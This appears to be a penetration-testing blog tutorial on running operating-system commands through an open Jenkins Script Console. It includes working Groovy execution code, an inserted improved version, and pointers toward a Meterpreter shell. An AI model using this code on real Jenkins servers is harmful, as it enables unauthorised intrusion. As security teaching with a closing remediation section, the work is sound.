Hacking Jenkins Servers With No Password

Introduction
Here’s a fun trick I have been using on some recent Information Security Assessments to gain an initial foothold. If you aren’t familiar with Jenkins, it listens on port 8080 by default, and installs of this era (2014) came with security disabled, so anyone who can reach that port gets full administrative access with no password (Hurray!). Jenkins 2.0 and later enable security and generate an initial admin password during setup, so what follows applies to older or deliberately unsecured installs, and to any instance where you hold an account with administrator rights.

According to their wiki: “Jenkins is an award-winning application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.” Here is what it looks like.

[Screenshot: the Jenkins dashboard]

This is some Groovy script right here
Conveniently, Jenkins ships with a native Groovy interpreter and exposes it through the Script Console at the “/script” path. Click the “Manage Jenkins” link in the left-hand navigation pane and then “Script Console” from the main menu. Anything you type there runs inside the Jenkins process itself, on the Jenkins master, with whatever operating system account that process runs as. Here is what you will find.
[Screenshot: the Jenkins Script Console]

Let’s have some fun
Now, if you’re like me and you haven’t even heard of Groovy, much less know how to write it, you’re in luck: it is 2014 and we all have smartphones with unlimited access to the all-powerful Google Machine. Click a few links, skim a few paragraphs, and you’ll find that Groovy can execute operating system commands with the following:

Stolen From Stackoverflow

def sout = new StringBuffer(), serr = new StringBuffer()  // buffers that will receive stdout and stderr
def proc = '[INSERT COMMAND]'.execute()                    // Groovy's String.execute() spawns the named program
proc.consumeProcessOutput(sout, serr)                      // copy the process's stdout/stderr into the two buffers
proc.waitForOrKill(1000)                                   // wait up to 1000 ms, then kill the process if still running
println "out> $sout err> $serr"                            // print whatever came back

This doesn’t appear overly complex but for the sake of completeness lets walk through it:

  1. We declare two objects of type “StringBuffer”: ‘sout’ and ‘serr’.
  2. Next we call the .execute() method on a string, which should be the name of a program on the target, and store the resulting Process in the variable ‘proc’.
  3. We grab the process output with the .consumeProcessOutput() method, passing in our two string buffers as per the method definition.
  4. .waitForOrKill(1000) waits up to 1000 milliseconds for the process to finish and kills it if it doesn’t; one second is fine for quick commands but too short for anything slow.
  5. Finally we print the process output and any errors that were generated.

Cool, so that should be easy enough. Let’s paste that into our console window and run some OS commands. All we need to do is substitute “[INSERT COMMAND]” with what we want to run. We’ll start with a simple “dir” command.

[Screenshot: running the script with “dir” fails with “CreateProcess error=2”]

Damn! (shouted with an English accent for added flair) we got an error. Alright, let’s work this out. The error says “Cannot run program “dir”: CreateProcess error=2, The system cannot find the file specified…” Well, that makes sense: “dir” isn’t an executable on the target system, it is a built-in command of cmd.exe, and String.execute() looks for a program by that name rather than going through a shell. (The CreateProcess error also tells us the Jenkins master is running on Windows.) Let’s tell Jenkins to run cmd.exe instead.

[Screenshot: running “cmd.exe” returns no output]

Getting closer. From the looks of it, Groovy spawned an instance of cmd.exe, but we can’t interact with it: with no arguments, cmd.exe sits waiting for input on stdin that never arrives, and waitForOrKill() terminates it after a second, so nothing comes back. So let’s pass a command via the /C parameter. “cmd.exe /c dir” should do the trick, I think.

[Screenshot: “cmd.exe /c dir” returns the directory listing]
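As an added example (not code from the original post or from the Jenkins project), here is a version of the StackOverflow snippet that handles the two problems just hit. The command to run is an assumed placeholder; everything else is standard Groovy. It picks cmd.exe /c on Windows and /bin/sh -c elsewhere so shell built-ins like “dir” work, passes the command as an argument list so Groovy does not re-tokenize it on whitespace, waits longer than one second before killing the process, and reports the exit code and the account Jenkins runs as.

```groovy
// Added example: paste into Manage Jenkins -> Script Console. Not from the original post.
// 'cmd' is an assumed placeholder; replace it with the command you want to run.
def cmd = 'dir'

// Pick a shell for the OS the Jenkins process is running on. Going through the
// shell with /c or -c is what makes built-ins like "dir" work: String.execute()
// alone looks for an executable named "dir" and fails with CreateProcess error=2.
def isWindows = System.getProperty('os.name').toLowerCase().contains('windows')
def argv = isWindows ? ['cmd.exe', '/c', cmd] : ['/bin/sh', '-c', cmd]

def sout = new StringBuffer(), serr = new StringBuffer()
// List.execute() passes each element as its own argument, so spaces and quotes
// inside 'cmd' reach the shell intact instead of being split by Groovy.
def proc = argv.execute()
proc.consumeProcessOutput(sout, serr)
// 1000 ms is too short for anything slow (a "net view", say); allow 30 s, then kill.
proc.waitForOrKill(30000)

// user.name is the OS account Jenkins runs as, i.e. the account your commands run as.
println "os: ${System.getProperty('os.name')}  user: ${System.getProperty('user.name')}"
println "exit code: ${proc.exitValue()}"
println "stdout:\n${sout}"
println "stderr:\n${serr}"
```

The exit code is worth printing: a killed process or a command the shell could not find shows up there even when stdout is empty, which saves guessing at what happened behind the blank screen.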

Conclusion
So there you have it: a simple, one-line-at-a-time command execution gateway, and a valuable find when penetration testing. Surely you can think of creative ways to turn this access into something bigger and better, like a Meterpreter shell; I’ll leave that piece up to you. Also, it’s worth noting that there is a Metasploit module for this already (exploit/multi/http/jenkins_script_console, “Jenkins Script-Console Java Execution”). I have yet to be successful with it but you might have different results, so be sure to check it out. If you administer Jenkins, the fix is to enable security, require authentication, and limit administrator rights (and therefore the Script Console) to the few people who need them; a quick check is that an unauthenticated request to /script should not return the console. Thank you for reading and, as always, hack responsibly!
